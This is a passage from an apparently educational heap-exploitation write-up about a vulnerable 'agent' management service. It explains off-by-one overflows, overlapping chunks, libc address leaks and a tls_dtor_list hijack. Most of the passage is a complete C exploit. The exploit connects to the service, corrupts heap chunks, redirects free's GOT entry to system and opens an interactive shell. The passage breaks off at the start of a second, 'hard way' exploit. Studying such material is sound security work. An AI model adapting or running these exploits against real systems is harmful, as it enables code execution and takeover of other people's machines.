<p>The next step is delete agent Ag_2 and corrupt the size of the chunk holding
its name (see Figure 5). Now, if we create a new agent Ag_5 on the space left
free by agent Ag_2, then the chunk holding the main structure of agent Ag_3
will be overlapped. In our case, we point the name’s pointer to free‘s GOT
entry.</p>
<p>If we dump, the data (agent_show) of agent Ag_3, we can leak the address of a
libc function and deduce where system address is mapped to.</p>
<p>The final attack stage is to edit the data (agent_edit) of agent Ag_3 to
redirect free() calls to system() calls. Now, if we delete Ag_4, we got a
shell.</p>
<p><img src="/images/heap_exploit_easy.png" alt="" />
<em>Figure 5 – Overflowing and overlapping next chunk</em></p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <inttypes.h>
</span>
<span class="cp">#define HOSTNAME "localhost"
#define PORT 5555
#define GOTFREE 0x6015d8
#define SYSOFFSET 0x3b160
</span>
<span class="cp">#define COLOR_SHELL "\033[31;01mshell\033[00m > "
</span>
<span class="kt">int</span> <span class="nf">setsock</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">hostname</span><span class="p">,</span> <span class="kt">int</span> <span class="n">port</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">send_data</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">session</span><span class="p">();</span>
<span class="kt">int</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_create_ex</span><span class="p">(</span><span class="kt">char</span> <span class="n">c</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_create</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_select</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_show</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_edit</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_delete</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">select_option</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">opt</span><span class="p">);</span>
<span class="k">struct</span> <span class="n">fake_agent</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">chunk_size</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">reserved_0</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">name</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">id</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">int</span> <span class="n">sock</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">system</span><span class="p">,</span> <span class="n">free</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">fake_agent</span> <span class="n">agent</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">output</span><span class="p">[</span><span class="mi">1024</span><span class="p">],</span> <span class="n">input</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[1] connecting to target ...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">setsock</span><span class="p">(</span><span class="n">HOSTNAME</span><span class="p">,</span> <span class="n">PORT</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] connected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="mi">1024</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[2] shaping heap</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent_create_ex</span><span class="p">(</span><span class="sc">'A'</span><span class="p">,</span> <span class="mh">0x88</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">agent_create_ex</span><span class="p">(</span><span class="sc">'B'</span><span class="p">,</span> <span class="mh">0x88</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="n">agent_create_ex</span><span class="p">(</span><span class="sc">'C'</span><span class="p">,</span> <span class="mh">0xa0</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">agent_create_ex</span><span class="p">(</span><span class="sc">'D'</span><span class="p">,</span> <span class="mh">0xa0</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">agent_create_ex</span><span class="p">(</span><span class="sc">'E'</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">);</span>
<span class="n">agent_edit</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"/bin/sh"</span><span class="p">,</span> <span class="mi">7</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[3] overflowing next chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="sc">'B'</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">);</span>
<span class="n">input</span><span class="p">[</span><span class="mh">0x88</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xf1</span><span class="p">;</span>
<span class="n">agent_edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="mh">0x88</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[4] overlapping next chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent</span><span class="p">.</span><span class="n">chunk_size</span> <span class="o">=</span> <span class="mh">0xb1</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">len</span> <span class="o">=</span> <span class="mh">0xff</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">reserved_0</span> <span class="o">=</span> <span class="mh">0xdeadbeef</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">GOTFREE</span><span class="p">;</span>
<span class="n">agent</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span>
<span class="n">memset</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="sc">'F'</span><span class="p">,</span> <span class="mh">0xa6</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">input</span> <span class="o">+</span> <span class="mh">0xa6</span><span class="p">,</span> <span class="o">&</span><span class="n">agent</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">fake_agent</span><span class="p">));</span>
<span class="n">agent_create</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mh">0xa6</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">fake_agent</span><span class="p">));</span>
<span class="n">agent_show</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">output</span><span class="p">));</span>
<span class="n">free</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)(</span><span class="n">output</span><span class="p">));</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] free function mapped at 0x%"</span><span class="n">PRIx64</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">free</span><span class="p">);</span>
<span class="n">system</span> <span class="o">=</span> <span class="n">free</span> <span class="o">-</span> <span class="n">SYSOFFSET</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] system function mapped at 0x%"</span><span class="n">PRIx64</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">system</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[5] pwning</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">agent_edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">system</span><span class="p">,</span> <span class="mi">6</span><span class="p">);</span>
<span class="n">agent_delete</span><span class="p">(</span><span class="mi">4</span><span class="p">);</span>
<span class="n">session</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_create</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"1"</span><span class="p">);</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_create_ex</span><span class="p">(</span><span class="kt">char</span> <span class="n">c</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="n">len</span><span class="p">];</span>
<span class="n">memset</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">agent_create</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_select</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">ag</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="n">snprintf</span><span class="p">(</span><span class="n">ag</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="s">"%d"</span><span class="p">,</span> <span class="n">agent</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"2"</span><span class="p">);</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">ag</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_show</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">agent_select</span><span class="p">(</span><span class="n">agent</span><span class="p">);</span>
<span class="n">write</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="s">"3</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_edit</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">agent_select</span><span class="p">(</span><span class="n">agent</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"4"</span><span class="p">);</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">agent_delete</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">agent_select</span><span class="p">(</span><span class="n">agent</span><span class="p">);</span>
<span class="n">select_option</span><span class="p">(</span><span class="s">"5"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">select_option</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">opt</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">send_data</span><span class="p">(</span><span class="n">opt</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">send_data</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">output</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">fd_set</span> <span class="n">fds</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">timeval</span> <span class="n">tv</span> <span class="o">=</span> <span class="p">{</span> <span class="p">.</span><span class="n">tv_sec</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="p">.</span><span class="n">tv_usec</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">write</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="n">FD_ZERO</span><span class="p">(</span><span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">select</span><span class="p">(</span><span class="n">sock</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">tv</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="mi">1024</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">output</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">setsock</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">hostname</span><span class="p">,</span> <span class="kt">int</span> <span class="n">port</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">s</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">hostent</span> <span class="o">*</span><span class="n">hent</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sa</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">in_addr</span> <span class="n">ia</span><span class="p">;</span>
<span class="n">hent</span> <span class="o">=</span> <span class="n">gethostbyname</span><span class="p">(</span><span class="n">hostname</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hent</span><span class="p">)</span> <span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span><span class="p">,</span> <span class="n">hent</span><span class="o">-></span><span class="n">h_addr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span><span class="p">((</span><span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span> <span class="o">==</span> <span class="n">INADDR_ANY</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"incorrect address !!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">((</span><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"socket failed !!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span>
<span class="n">sa</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">ia</span><span class="p">.</span><span class="n">s_addr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sa</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sa</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection failed !!!!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">s</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">session</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">int</span> <span class="n">amt</span><span class="p">;</span>
<span class="n">fd_set</span> <span class="n">fds</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[!] enjoy your shell </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">COLOR_SHELL</span><span class="p">,</span> <span class="n">stderr</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">FD_ZERO</span><span class="p">(</span><span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="n">FD_SET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">select</span><span class="p">(</span><span class="n">sock</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">buf</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">write</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FD_ISSET</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&</span><span class="n">fds</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="n">amt</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">handle_error</span><span class="p">(</span><span class="s">"connection lost</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">buf</span><span class="p">[</span><span class="n">amt</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">COLOR_SHELL</span><span class="p">,</span> <span class="n">stderr</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<h2 id="write-up--the-hard-way">Write-up – The hard way</h2>
<p>Assume now that we apply the following patch to the vulnerable code. Ok, that
is better but the code is still vulnerable to an off-by-one heap-based
overflow. We cannot enlarge the size of chunks but if we allocate large ones,
we can shrink them by overwritting the LSB of the chunk size with a NULL byte.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">88</span><span class="n">c88</span>
<span class="o"><</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">name</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">len</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="o">---</span>
<span class="o">></span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">name</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">len</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span>
<span class="mi">92</span><span class="n">c92</span>
<span class="o"><</span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">size</span> <span class="o">=</span> <span class="n">len</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="o">---</span>
<span class="o">></span> <span class="n">agents</span><span class="p">[</span><span class="n">agent_count</span><span class="p">]</span><span class="o">-></span><span class="n">size</span> <span class="o">=</span> <span class="n">len</span> <span class="o">+</span> <span class="mi">2</span><span class="p">;</span></code></pre></figure>
<p>The scenario depicted in Figure 3 cannot be applied in one go. We need first to
shape the heap in order to produce overlapping chunks.</p>
<p>A closer look at the patch shows that we cannot overflow chunks while editing
agents. The chunk size can be corrupted only during agent creation. So the only
way to corrupt the chunk size is to allocate a fastbin chunk followed by a
large chunk, then free both of them and finally reallocate the fastbin chunk by
overflowing this time the size of the next chunk. We rely on a fastbin chunk
since it is not merged with adjacent chunks when freed.</p>
<p>Figure 6 sums up the steps to shape the heap:</p>
<ol>
<li>
<p>We create two agents Ag_0 and Ag_1. A fast bin chunk is allocated to hold
the name of agent Ag_1.</p>
</li>
<li>
<p>We delete Agent Ag_0.</p>
</li>
<li>
<p>We create two agents Ag_2 and Ag_3 by requesting large sizes to hold their names.</p>
</li>
<li>
<p>We delete Ag_2 and Ag_1.</p>
</li>
</ol>
<p><img src="/images/heap_shape_hard.png" alt="" />
<em>Figure 6 – Shaping the heap</em></p>
<p>Now, we are ready to overwrite the size of the previously freed chunk
(structure holding Ag_2’s name) by requesting small size (we need a fast bin
allocation) for the newly created agent Ag_4.</p>
<p>Then, we create three additional agents Ag_5, Ag_6 and Ag_7 that fit in memory
on the free space left by Ag_2. Once deleting Ag_5, Ag_7 and Ag_3, the chunks
holding Ag_6’s data will be overlapped if we create a new agent as shown below:</p>
<p><img src="/images/heap_exploit_hard.png" alt="" />
<em>Figure 7 – Overflowing and overlapping next chunk</em></p>
<p>Note that we created agent Ag_7 and deleted it in the sole purpose to get fd and
bk pointers adjacent to the structure holding the name of agent Ag_6. These
addresses will be leaked later in order to resolve some libc addresses.</p>
<p>In our exploit, we create a new agent Ag_8 such that its data overlaps the len
field of agent Ag_6. Dumping the data of this agent will leak the address the
fd pointer from which we can deduce the address of system in libc address
space.</p>
<p>Note that in our example, we assume that the binary has been hardened by
enabling all gcc’s memory corruption mitigation flags. This means that we
cannot rely on the previously technique to overwrite a GOT entry.</p>
<p>Our goal to achieve code execution is to create a fake tls_dtor_list which is a
single linked list of functions that run at program exit:</p>
<p>The address of the tls_dtor_list pointer could be derived by setting a pointer
on function __call_tls_dtors which iterates over the tls_dtor_list:</p>
<p><img src="/images/tls_dtor_list.png" alt="" class="center" />
<em>Figure 8 – Getting the tls_dtor_list pointer address</em></p>
<p>This pointer will be used to overwrite the name pointer of agent Ag_6 when
editing the data of agent Ag_8. Finally, we edit the data of agent_6 that
points now to tls_dotr_list and copy there our fake tls_dtor_entry.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <inttypes.h>
</span>
<span class="cp">#define HOSTNAME "localhost"
#define PORT 5555
</span>
<span class="cp">#define SYS_OFFSET 0x362198
#define TLS_OFFSET 0x1ff038
</span>
<span class="cp">#define COLOR_SHELL "\033[31;01mshell\033[00m > "
</span>
<span class="kt">int</span> <span class="nf">set_sock</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">hostname</span><span class="p">,</span> <span class="kt">int</span> <span class="n">port</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">send_data</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">session</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">);</span>
<span class="kt">int</span> <span class="nf">handle_error</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">msg</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_create</span><span class="p">(</span><span class="kt">char</span> <span class="n">c</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span>
<span class="kt">void</span> <span class="nf">agent_select</span><span class="p">(</span><span class="kt">int</span> <span class="n">agent</span><span class="p">);</span>
